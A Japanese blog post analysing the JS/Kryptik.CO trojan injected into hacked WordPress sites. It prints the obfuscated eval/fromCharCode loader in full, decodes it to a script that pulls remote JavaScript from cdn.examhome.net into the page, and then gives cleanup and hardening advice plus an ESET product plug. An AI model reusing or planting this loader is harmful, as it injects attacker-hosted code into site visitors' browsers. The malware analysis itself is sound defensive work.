WordPressを改ざんして海外サイトにリダイレクトする「JS/Kryptik.CO」というトロイの木馬

ググってたまたま見たブログに突然ESETが反応して警告を出してきたので何なのか詳しく調べてみました。どうやら最近いろんなサイトで頻発しているみたいです。

脅威が削除されました

サイトを開いた瞬間にESET Internet Securityがこの警告を出してきました。

JS/Kryptik.CO

トロイの木馬(マルウェア)の一種です。

実行すると何が起こるのか

ソースコードを見てみると以下のようなJavascriptのコードがフッターあたりに複数書かれていました。

<script language=javascript>eval(String.fromCharCode(118,97,114,32,101,108,101,109,32,61,32,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,32,101,108,101,109,46,116,121,112,101,32,61,32,39,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,39,59,32,32,101,108,101,109,46,97,115,121,110,99,32,61,32,116,114,117,101,59,32,101,108,101,109,46,115,114,99,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,32,49,49,54,44,32,49,49,54,44,32,49,49,50,44,32,49,49,53,44,32,53,56,44,32,52,55,44,32,52,55,44,32,57,57,44,32,49,48,48,44,32,49,49,48,44,32,52,54,44,32,49,48,49,44,32,49,50,48,44,32,57,55,44,32,49,48,57,44,32,49,48,52,44,32,49,49,49,44,32,49,48,57,44,32,49,48,49,44,32,52,54,44,32,49,49,48,44,32,49,48,49,44,32,49,49,54,44,32,52,55,44,32,57,57,44,32,49,48,48,44,32,49,49,48,44,32,52,54,44,32,49,48,54,44,32,49,49,53,44,32,54,51,44,32,49,49,56,44,32,49,48,49,44,32,49,49,52,44,32,54,49,44,32,52,57,44,32,52,54,44,32,52,56,44,32,52,54,44,32,53,48,41,59,10,10,118,97,114,32,97,108,108,115,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,115,99,114,105,112,116,39,41,59,32,10,118,97,114,32,110,116,51,32,61,32,116,114,117,101,59,32,10,102,111,114,32,40,32,118,97,114,32,105,32,61,32,97,108,108,115,46,108,101,110,103,116,104,59,32,105,45,45,59,41,32,123,10,105,102,32,40,97,108,108,115,91,105,93,46,115,114,99,46,105,110,100,101,120,79,102,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,49,44,32,49,50,48,44,32,57,55,44,32,49,48,57,44,32,49,48,52,44,32,49,49,49,44,32,49,48,57,44,32,49,48,49,41,41,32,62,32,45,49,41,32,123,32,10,9,9,110,116,51,32,61,32,102,97,108,115,101,59,10,9,125,32,10,125,32,10,105,102,40,110,116,51,32,61,61,32,116,114,117,101,41,123,10,10,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,34,104,101,97,100,34,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,101,108,101,109,41,59,10,10,125));</script>

fromCharCodeで変換したコードを実行しているようです。
これを実行した変換元のコードが以下。

var elem = document.createElement('script'); elem.type = 'text/javascript'; elem.async = true; elem.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 99, 100, 110, 46, 101, 120, 97, 109, 104, 111, 109, 101, 46, 110, 101, 116, 47, 99, 100, 110, 46, 106, 115, 63, 118, 101, 114, 61, 49, 46, 48, 46, 50); var alls = document.getElementsByTagName('script'); var nt3 = true; for ( var i = alls.length; i--;) { if (alls[i].src.indexOf(String.fromCharCode(101, 120, 97, 109, 104, 111, 109, 101)) > -1) { nt3 = false; } } if(nt3 == true){ document.getElementsByTagName("head")[0].appendChild(elem); }

さらに変換した文字列が・・・
再び変換してみると、

https://cdn.examhome.net/cdn.js?ver=1.0.2 というURLが出てきました。
アクセスしてもサーバーが存在していないのでもう閉鎖されているようです。
外部

対処方法

おそらくサーバー上のファイルやデータベースが書き換えられています。どのファイルが書き換えられているか探すのはかなり困難なのでとりあえず再インストールすべきでしょう。データベースにも書き込まれている可能性があるのでPHPMyAdminやプラグインの「Search Regex」等を使って検索して書き換えなければいけません。かなり大変だと思います。

参考リンク:WordPressサイトが不正アクセスコード改ざんされたのでその対応方法

被害に合わないためには

ルートディレクトリにインストールしない

サイトアドレスはhttp:www.example.com、WordPress アドレスはhttp:www.example.com/wp/のようにサブディレクトリ内にインストールして実際の表示はルートディレクトリのように設置します。

WordPress を専用ディレクトリに配置する

まずはこれが一番です。過去に仕事で数十件ものWordPressサイトを構築してきましたが改ざんされたことは一度もありません。

改ざんしてくる方法はプログラムでhttp:www.********.com/wp-login.phpやhttp:www.********.com/wp-admin/のように手当たり次第にWordPressのファイルにアクセスして脆弱性を突こうとしてくるので、一つ下層のディレクトリにあるだけでアクセスされなくなるのです。

更新されていないプラグインは使わない

プラグインの詳細を見て「最終更新:〇年前」のように長い間更新されていないプラグインは脆弱性が見つかっても放置されているので狙われることが多いです。どんなに便利でも使うのはやめておきましょう。

セキュリティ系プラグインを使う

例えばiThemes Securityは複数回のログイン試行があったらロックしたり、ファイルが書き換えられたときにメールで通知してくれたりと安全な機能がいろいろあります。

ESET ファミリーセキュリティがおすすめ

今回脅威を検知してくれたESET Internet Securityはファミリー版だと端末5台で3年間4,980円と格安で使えます。Windows、Mac、Andorid等複数のOSに対応しているので家族じゃなくても複数台所有するユーザーにもおすすめです。

コメントを残す

メールアドレスが公開されることはありません。 * が付いている欄は必須項目です

CAPTCHA